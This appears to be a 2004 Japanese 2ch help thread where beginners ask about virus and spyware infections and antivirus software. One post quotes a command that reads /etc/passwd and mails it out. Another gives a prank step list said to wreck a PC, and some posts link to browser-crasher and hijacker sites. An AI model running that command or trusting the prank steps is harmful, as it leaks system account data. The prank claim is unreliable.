OSはXP HOME EDITION
SONY VAIO GRX 52です。
>>919
ソニーから購入だな。<リカバリディスク
ソニーから購入だな。<リカバリディスク
>>915
ここは鑑定スレじゃない
ここは鑑定スレじゃない
923 :ひよこ名無しさん:04/08/06 21:19 ID:9xTOXUkL
きゃっと/えとせとら/ぱすwd| めーる のーばでぃ
実際は英語で書かれて居るのですが、
これってウィルスですか?
よろしくお願いします
パソコン初心者板総合質問スレで聞いたのですが、
今になってウィルスに関する質問だからこっちか。
と気づいたのでマルチポストになってます。すみません。
実際は英語で書かれて居るのですが、
これってウィルスですか?
よろしくお願いします
パソコン初心者板総合質問スレで聞いたのですが、
今になってウィルスに関する質問だからこっちか。
と気づいたのでマルチポストになってます。すみません。
>>923
質問するまでもなく、このスレを見ればわかるよ
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/
質問するまでもなく、このスレを見ればわかるよ
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/
925 :923:04/08/06 21:24 ID:9xTOXUkL
>>925
ID出さなかったからスルーされてただけだ
ID出さなかったからスルーされてただけだ
927 :ひよこ名無しさん:04/08/06 22:32 ID:gSncYd7k
マウスのポインタが画面の端の方に勝手に一瞬のうちに動く時があります。
普通にマウスを触っているだけで、特に動かしているわけでもありません。
同じマウスを会社でも使っているのですが、自宅のマウスだけがおかしいです。
マウスのプロパティなどを見てみましたが、正常に動いてるらしく原因がわかりません。
スパイウェアとやらなのでしょうか?
普通にマウスを触っているだけで、特に動かしているわけでもありません。
同じマウスを会社でも使っているのですが、自宅のマウスだけがおかしいです。
マウスのプロパティなどを見てみましたが、正常に動いてるらしく原因がわかりません。
スパイウェアとやらなのでしょうか?
929 :ひよこ名無しさん:04/08/06 23:12 ID:Jk8VN+nf
ttp://www5d.biglobe.ne.jp/~marudash/img-box/img20040806045659.jpg
あのここ開いたらウィルスに感染してしまったんですけど、
なんのウィルスかわかりますか?鑑定スレはどこにあるんでしょうか?
あのここ開いたらウィルスに感染してしまったんですけど、
なんのウィルスかわかりますか?鑑定スレはどこにあるんでしょうか?
>>929
なんのウィルスかわからないのに、「ウィルスに感染した」って
断言できるの?
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
こっち行って、テンプレに書いてある事全部試してみなさいな。
なんのウィルスかわからないのに、「ウィルスに感染した」って
断言できるの?
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
こっち行って、テンプレに書いてある事全部試してみなさいな。
931 :929:04/08/06 23:23 ID:Jk8VN+nf
>>929
勇気が無くて見られない画像解説スレ Part597
http://etc3.2ch.net/test/read.cgi/entrance/1091760116/
既出かどうか検索してから書き込めよ。
勇気が無くて見られない画像解説スレ Part597
http://etc3.2ch.net/test/read.cgi/entrance/1091760116/
既出かどうか検索してから書き込めよ。
933 :ひよこ名無しさん:04/08/07 00:36 ID:0895oaLF
YBBの無料キャンペーンのヤツやってたものですが、期限期限うるさいので
ノートンアンチウィルス2004延長キーを購入して、単にこのキーを入力すれば
延長するんだろうと思っていたところ
YBBバージョンはシマンテックのサポート外とか書いてありまして
どうしたもんでしょうか、、延長キー間違って買ったっぽいですが・・
返金とかできませんか?というか、YBBのバージョンとか全く意味不明です
大体アンチウィルスとインターネットセキュリティって二つ?ある意味もわからないのに・・
全部まとめて1個!で売ってくれ。。
ノートンアンチウィルス2004延長キーを購入して、単にこのキーを入力すれば
延長するんだろうと思っていたところ
YBBバージョンはシマンテックのサポート外とか書いてありまして
どうしたもんでしょうか、、延長キー間違って買ったっぽいですが・・
返金とかできませんか?というか、YBBのバージョンとか全く意味不明です
大体アンチウィルスとインターネットセキュリティって二つ?ある意味もわからないのに・・
全部まとめて1個!で売ってくれ。。
934 :ひよこ名無しさん:04/08/07 11:06 ID:bHNAVXEM
ぬるぽに感染してウイルスバスターでウイルス駆除もしたんですが、
XPでスタート→すべてのプログラム→ファイルを選んで右クリックすると
”開く” ”別のユーザーとして実行(A)”の下が空白で直りません。
直し方を教えて下さい。
お願いします。
XPでスタート→すべてのプログラム→ファイルを選んで右クリックすると
”開く” ”別のユーザーとして実行(A)”の下が空白で直りません。
直し方を教えて下さい。
お願いします。
>>934
“ガッ”と一撃を食らわす。
“ガッ”と一撃を食らわす。
936 :ひよこ名無しさん:04/08/07 12:25 ID:1IUSEMb7
ttp://start-page.info/?u=1526
↑
ホムペをクリックするとこの外人のページに切り替わる。
インターネットオプションでホムペを変えても
すぐにホムペがこれになる。
ttp://www.pretty-teens.info/
↑
お気に入りにこれが追加されてる。消してもすぐにこれがお気に入りに
追加される。
パソコン初心者板でも聞きましたが マルチ扱いされて
答えてもらえませんでした。
これは一体どういう事でしょう。
>>936
エロサイトスレ逝ってテンプレ実行
エロサイトスレ逝ってテンプレ実行
938 :ひよこ名無しさん:04/08/07 16:22 ID:2FOK4BPY
最近よくウィルスがくるんですけど、メールアドレスからドメインって調べられるのですか?
初心者でスイマセン
初心者でスイマセン
939 :ぼるじょあ ◆yBEncckFOU :04/08/07 16:35 ID:???
(・3・) エェー 君はドメインって言う単語を調べたほうが良いYO
メールアドレスには、でっかいドメインが入っているね
941 :ひよこ名無しさん:04/08/07 19:04 ID:Dy2g/8Xp
ありがとうございます。
@以降をドメインっていうんですか?
IPアドレスを調べることはできないのですか?
@以降をドメインっていうんですか?
IPアドレスを調べることはできないのですか?
>>907
情報取られて逮捕とはどういう意味でしょうか?
とにかくウィルスバスター2004の評価版が試用期限切れたあともアップデートされ続ける
現象についてお聞きしたいです。購入する必要はないのでしょうか?よろしくおねがいします。
情報取られて逮捕とはどういう意味でしょうか?
とにかくウィルスバスター2004の評価版が試用期限切れたあともアップデートされ続ける
現象についてお聞きしたいです。購入する必要はないのでしょうか?よろしくおねがいします。
>>943
猶予期間
猶予期間
猶予期間でしたか。サンクス。
946 :ひよこ名無しさん:04/08/07 23:02 ID:VaBUSd95
PC初心者です。
SPYBOTっていうのを使ってるんですが、いつも同じ物がひっかかるのです。
’PurityScan’ ’CnsMin’ ’DSO Exploit’
上記3つです。なぜか削除も修復もできない・・・
どなたか助けてぷり〜ず。
SPYBOTっていうのを使ってるんですが、いつも同じ物がひっかかるのです。
’PurityScan’ ’CnsMin’ ’DSO Exploit’
上記3つです。なぜか削除も修復もできない・・・
どなたか助けてぷり〜ず。
ファイルをダウンロードしたら起動時に、
ぬるぽ ぬるぽ オートラン♪
ヌルポ ヌルポ AutoRun♪
ぬるぽ ぬるぽ オートラン♪
おまえが踏まなきゃ誰が踏む!
というのが出るようになりました。
調べてみたところ、winnyやっていると感染するらしいですが、私はやってないです。
「.exe」というファイルを削除したら症状はなくなったのですが、これで大丈夫でしょうか。
ダウンロード板の方は難しくてよく分からないです。御教授お願いします。
ぬるぽ ぬるぽ オートラン♪
ヌルポ ヌルポ AutoRun♪
ぬるぽ ぬるぽ オートラン♪
おまえが踏まなきゃ誰が踏む!
というのが出るようになりました。
調べてみたところ、winnyやっていると感染するらしいですが、私はやってないです。
「.exe」というファイルを削除したら症状はなくなったのですが、これで大丈夫でしょうか。
ダウンロード板の方は難しくてよく分からないです。御教授お願いします。
949 :946:04/08/07 23:20 ID:VaBUSd95
ありがとうございます。早速見てみます。
>>946
【雑談禁止】スパイウェア削除ソフトSpybot 15
http://pc5.2ch.net/test/read.cgi/sec/1090594050/8
DSO Exploitについてはココ読んでから>>947
【雑談禁止】スパイウェア削除ソフトSpybot 15
http://pc5.2ch.net/test/read.cgi/sec/1090594050/8
DSO Exploitについてはココ読んでから>>947
951 :ひよこ名無しさん:04/08/08 03:01 ID:ZrEc/Zof
Explorer.exeにW32/Backdoor-cfbというウィルスが検出されたんですが
どうすれば駆除できるのでしょうか?
>>951
削除する
削除する
953 :ひよこ名無しさん:04/08/08 04:41 ID:Olk3x6Z9
パソコン初心者なのですが
PE_PARITE.A-1
PE_PARITE.A
とゆうのがウィルス検索をしたら出てきたのですが
何をどうすればいいのでしょうか?
PE_PARITE.A-1
PE_PARITE.A
とゆうのがウィルス検索をしたら出てきたのですが
何をどうすればいいのでしょうか?
PE_PARITE.A-1
PE_PARITE.A
を
駆除すれば良い
PE_PARITE.A
を
駆除すれば良い
955 :ぼるじょあ ◆yBEncckFOU :04/08/08 04:47 ID:???
(・3・) エェー ココ行けよ↓
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A-1
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A-1
956 :ぼるじょあ ◆yBEncckFOU :04/08/08 04:50 ID:???
(・3・) エェー A1の方は確かキケンなウイルスだYO
どう危険なのさ?
958 :953:04/08/08 04:57 ID:Olk3x6Z9
検索結果の表示が
C:\Documents and ・・・
までしか表示されなくてどのファイルに感染してるのかが解からないんですが
どうしたらよろしいのでしょうか?
C:\Documents and ・・・
までしか表示されなくてどのファイルに感染してるのかが解からないんですが
どうしたらよろしいのでしょうか?
ダメージでかい。<危険
>>957
パソコンが大爆発すんだよ。
パソコンが大爆発すんだよ。
962 :953:04/08/08 05:47 ID:Olk3x6Z9
C:Documents and Settings\Owner\Local Settings\Temp\bon32.tmp
でPE_PARITE.A-1が検出されたのですがOwnerとゆうファイルは見つけたのですが
その中にLocal Settingsとゆうファイルが見つからず先に進めませんどうしたらいいのでしょう?
あとPE_PARITE.Aの方も全部削除しなくてはならないのでしょうか?
2回検索したのですが
感染ファイルの数が一回目の時は120個くらいだったのに
二回目は800個を超えたんですが・・・
ちなみにPE_PARITE.A-1の方は一個だけでした
>>960
見れましたどうもです
でPE_PARITE.A-1が検出されたのですがOwnerとゆうファイルは見つけたのですが
その中にLocal Settingsとゆうファイルが見つからず先に進めませんどうしたらいいのでしょう?
あとPE_PARITE.Aの方も全部削除しなくてはならないのでしょうか?
2回検索したのですが
感染ファイルの数が一回目の時は120個くらいだったのに
二回目は800個を超えたんですが・・・
ちなみにPE_PARITE.A-1の方は一個だけでした
>>960
見れましたどうもです
>>962
ハゲには無理。
ハゲには無理。
>>962
ツール>フォルダオプション>表示>ファイルとフォルダの表示>すべてのファイルとフォルダを表示するにチェック
PE_PARITE.Aは見つかったものをすべて削除
PE_PARITE.A-1は>>955のリンク先見て手動削除
ツール>フォルダオプション>表示>ファイルとフォルダの表示>すべてのファイルとフォルダを表示するにチェック
PE_PARITE.Aは見つかったものをすべて削除
PE_PARITE.A-1は>>955のリンク先見て手動削除
966 :ひよこ名無しさん:04/08/08 11:19 ID:X0/W9Jiy
質問させてください。昨日ディズニー関係のHPを開いたら突然トロイの木馬に感染しました。
マカフィーウィルススキャンを使ってウィルスを駆除したんですが、デスクトップ画像が真っ黒で赤い文字になったまま治りません。
インターネットにつなげようとすると変な青い英語の警告文がでてきます。
どうしたらよいのか教えて下さい…
マカフィーウィルススキャンを使ってウィルスを駆除したんですが、デスクトップ画像が真っ黒で赤い文字になったまま治りません。
インターネットにつなげようとすると変な青い英語の警告文がでてきます。
どうしたらよいのか教えて下さい…
ディズニーチケット買え
>>966
こっちに移動
テンプレよく読んで実行、質問はその後
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
こっちに移動
テンプレよく読んで実行、質問はその後
エロサイト見たら…助けてください!Part36
http://pc6.2ch.net/test/read.cgi/pcqa/1091521211/
969 :ひよこ名無しさん:04/08/08 15:04 ID:QD9P8abQ
PC起動時に勝手にデスクトップの壁紙が変わってしまいます。
これはウィルスなのでしょうか?
これはウィルスなのでしょうか?
>>670
ありがとうございました。
ありがとうございました。
トレンドマイクロのオンラインスキャンが表示できないんだが
漏れだけかな? もしかして落ちてる?
漏れだけかな? もしかして落ちてる?
超初心者なのですが、質問させてください。
ウィルスやトロイの木馬って、画像や動画を流出させる事が、
ありえるのでしょうか?
ウィルスやトロイの木馬って、画像や動画を流出させる事が、
ありえるのでしょうか?
すいません、質問させて下さい。
BKDR_TILLAH.Bっていうウイルスに感染したんですけど、
5月に買い換えたXPにノートンのお試し版みたいなのがついてて。
保障期間内のアップデートが可能になってたので、ライブアップデート
実行し、感染したとされる156個の内の78個を削除することに成功しますた。
駆除の直後に、「このコンピュータはまだ危険です」みたいな警告を
出されていたのですが、再起動し、再びスキャニングをしてみたところ
ウイルスが検出されず、メッセージの方も「問題ありません」となってました。
疑問に思ったので他のオンラインスキャンサービスでも試してみたのですが、
いずれも「ウイルスは検出されませんでした」となりまうす。
これって、もう全て駆除されたと信じていいんでしょうか?
BKDR_TILLAH.Bっていうウイルスに感染したんですけど、
5月に買い換えたXPにノートンのお試し版みたいなのがついてて。
保障期間内のアップデートが可能になってたので、ライブアップデート
実行し、感染したとされる156個の内の78個を削除することに成功しますた。
駆除の直後に、「このコンピュータはまだ危険です」みたいな警告を
出されていたのですが、再起動し、再びスキャニングをしてみたところ
ウイルスが検出されず、メッセージの方も「問題ありません」となってました。
疑問に思ったので他のオンラインスキャンサービスでも試してみたのですが、
いずれも「ウイルスは検出されませんでした」となりまうす。
これって、もう全て駆除されたと信じていいんでしょうか?
977 :976:04/08/09 17:31 ID:26sErh+4
スマソ、ID出してませんでした
>>977
定期的にスキャンを行ってその結果を信じるしかない。
はやく製品版購入した方がいいよ。試用期間が過ぎて
使い続けている人がよくいるけど、
ウィルス定義はいつでも最新のものにしておかないとまるで意味がないからね。
定期的にスキャンを行ってその結果を信じるしかない。
はやく製品版購入した方がいいよ。試用期間が過ぎて
使い続けている人がよくいるけど、
ウィルス定義はいつでも最新のものにしておかないとまるで意味がないからね。
>>975
ありえます。
ありえます。
981 :ひよこ名無しさん:04/08/09 23:43 ID:s49pbkeM
>>979
回答ありがとうございます。
でも、はぁ・・・、ありえるのですか。コワ〜。
最近、ウイルスチェックしたらたくさんかかっていたので、
ソフトを買ってそれらを削除しました。
でも、いちいちどのファイルにかかっているかは確認しませんでした。
どうでもいい話なんですが、僕はゲイでパソコンの中に恋人との
ヤバイ写真や動画をけっこう保存していて、万が一それが
流れているような事があったのなら、かなりキツイなぁ、というか、
もう生きていけないなとw 心配したのです。
ウィルスやトロイの木馬の事を少しだけ調べたら個人情報や文書の
事例ばかりだったので、映像が流れる事なんてありえるのかなと、
思いました。(普通のウィルスにはそんなことはできない?)
でもwinnyもやっていないし、まぁ大丈夫だとは思いますけど。
あ〜、でもウィルスって怖いな。
回答ありがとうございます。
でも、はぁ・・・、ありえるのですか。コワ〜。
最近、ウイルスチェックしたらたくさんかかっていたので、
ソフトを買ってそれらを削除しました。
でも、いちいちどのファイルにかかっているかは確認しませんでした。
どうでもいい話なんですが、僕はゲイでパソコンの中に恋人との
ヤバイ写真や動画をけっこう保存していて、万が一それが
流れているような事があったのなら、かなりキツイなぁ、というか、
もう生きていけないなとw 心配したのです。
ウィルスやトロイの木馬の事を少しだけ調べたら個人情報や文書の
事例ばかりだったので、映像が流れる事なんてありえるのかなと、
思いました。(普通のウィルスにはそんなことはできない?)
でもwinnyもやっていないし、まぁ大丈夫だとは思いますけど。
あ〜、でもウィルスって怖いな。
>>981
nyやってなくて、アンチウイルスソフトの最新版を常駐させておけば、まずは大丈夫です。
でも、ドライブあぼーんの凶悪なトロイなんかもありますので>>982さんの言うように大切な
ファイルはバックアップとっておいた方が良いでしょう。
nyやってなくて、アンチウイルスソフトの最新版を常駐させておけば、まずは大丈夫です。
でも、ドライブあぼーんの凶悪なトロイなんかもありますので>>982さんの言うように大切な
ファイルはバックアップとっておいた方が良いでしょう。
大発見!!!
1.XPでデスクトップにデスクトップというフォルダを作成
2.そのフォルダを開いて新しいフォルダ(名前はなんでもいい)を作成する
3.そのフォルダを開く ※何も起きない場合は2,3を繰り返す
4.アラートが出る
5.マイコンピューターを開こうとすると・・・
6.うあああああああああ!!!!
パソコン壊したい奴だけやってね
1.XPでデスクトップにデスクトップというフォルダを作成
2.そのフォルダを開いて新しいフォルダ(名前はなんでもいい)を作成する
3.そのフォルダを開く ※何も起きない場合は2,3を繰り返す
4.アラートが出る
5.マイコンピューターを開こうとすると・・・
6.うあああああああああ!!!!
パソコン壊したい奴だけやってね
1.XPでデスクトップにデスクトップというフォルダを作成
2.そのフォルダを開いて新しいフォルダ(名前はなんでもいい)を作成する
3.そのフォルダを開く ※何も起きない場合は2,3を繰り返す
4.アラートが出る
5.マイコンピューターを開こうとすると・・・
6.キタ━━(━(━(-( ( (゚∀゚) ) )-)━)━) ━━ !!!!!
2.そのフォルダを開いて新しいフォルダ(名前はなんでもいい)を作成する
3.そのフォルダを開く ※何も起きない場合は2,3を繰り返す
4.アラートが出る
5.マイコンピューターを開こうとすると・・・
6.キタ━━(━(━(-( ( (゚∀゚) ) )-)━)━) ━━ !!!!!
987 :ひよこ名無しさん:04/08/10 02:38 ID:S8ux2YZw
ttp://www.nurs.or.jp/~gatoo777/souko_gif/roo/4.html
(ブラクラです)
これ踏んじゃいました・・・OTL
赤い部屋、好きですか? とか出てきて
いきなり怖い女の人が出てくる奴です・・・
ウィルススキャンかけてますが、大丈夫でしょうか・・・
(ブラクラです)
これ踏んじゃいました・・・OTL
赤い部屋、好きですか? とか出てきて
いきなり怖い女の人が出てくる奴です・・・
ウィルススキャンかけてますが、大丈夫でしょうか・・・
988 :ひよこ名無しさん:04/08/10 02:48 ID:/askOJqZ
klez等の協力なウイルスを作った人って誰なんですか?
>>988
呼んだ?
呼んだ?
990 :ひよこ名無しさん:04/08/10 17:04 ID:QOPmkVTe
数ヶ月前から変な海外からの「WORM_NETSKY_P」とか「WORM_NETSKY_Q」
とかのウイルスメールが届いていて
ウイルスバスターが反応して消してたのでほうっておいたのですが、
これらは自分から自分に送られてるものかもしれないって聞いたのですが
ウイルスバスターで検索しても反応しないし、レジストリ覗いても発見できないの
どうやって駆除すればいいかわからなくて迷ってます。
この状態でWinny起動してるとやばいですかね?
とかのウイルスメールが届いていて
ウイルスバスターが反応して消してたのでほうっておいたのですが、
これらは自分から自分に送られてるものかもしれないって聞いたのですが
ウイルスバスターで検索しても反応しないし、レジストリ覗いても発見できないの
どうやって駆除すればいいかわからなくて迷ってます。
この状態でWinny起動してるとやばいですかね?
>>990
解りやすい釣りだな。
解りやすい釣りだな。
992 :ひよこ名無しさん:04/08/10 17:09 ID:PMBAKNgm
993 :990:04/08/10 17:11 ID:QOPmkVTe
すみません、全然つりじゃないつもりです。。。
>>992
マルチ死ね。
マルチ死ね。
995 :992:04/08/10 17:15 ID:PMBAKNgm
総合質問スレッドから誘導されてきました。
書き忘れてすみません
書き忘れてすみません
997
998
} }
} / o ゚.
. 〉'' ,、,,,__ ノ} 。 :∴
i ムツッ=,ニ_゙゙"''‐- 、、,,,__,,..,,,.. -‐'''"/ 。 X,, 999はいただくわ
l {{ ハ` `゚'~` ,‐-,ニ二ヾ,,_ヽ / i'(_,.l\
〉、`ハ } ` `゚'゙゙” }}'゙ ,' ti=ti、iiヽ
. / ハヽハ ノ // { ゙ヾヽ}
/ /ハヽヘ `、_ (Cノ/ / ハ ノラ
/ // } Y゙\ ` Cノイ / \ 〆'
. / / / / ,ゞ,, `-‐ ''´〆⌒ヽ{ ,' ハ \
;''"''ヾノ /_,/ `'' ァ''7/ \l l ヽヾ \
ゞ..,,.'' ̄// ''´ // \ \ヾ \
} / o ゚.
. 〉'' ,、,,,__ ノ} 。 :∴
i ムツッ=,ニ_゙゙"''‐- 、、,,,__,,..,,,.. -‐'''"/ 。 X,, 999はいただくわ
l {{ ハ` `゚'~` ,‐-,ニ二ヾ,,_ヽ / i'(_,.l\
〉、`ハ } ` `゚'゙゙” }}'゙ ,' ti=ti、iiヽ
. / ハヽハ ノ // { ゙ヾヽ}
/ /ハヽヘ `、_ (Cノ/ / ハ ノラ
/ // } Y゙\ ` Cノイ / \ 〆'
. / / / / ,ゞ,, `-‐ ''´〆⌒ヽ{ ,' ハ \
;''"''ヾノ /_,/ `'' ァ''7/ \l l ヽヾ \
ゞ..,,.'' ̄// ''´ // \ \ヾ \
1000 :ぼるじょあ ◆yBEncckFOU :04/08/10 19:07 ID:???
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ぼるじょあが1000ゲット!!
\
 ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
(,⌒`),⌒`)
⌒`)\\⌒`)
(,⌒`),⌒`)
\\ ∧∧
⌒`)(,,・3・)う
ズザーーーーーッ! ⊂,、 ∩∩
ゝ_'ソ
| ぼるじょあが1000ゲット!!
\
 ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
(,⌒`),⌒`)
⌒`)\\⌒`)
(,⌒`),⌒`)
\\ ∧∧
⌒`)(,,・3・)う
ズザーーーーーッ! ⊂,、 ∩∩
ゝ_'ソ
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。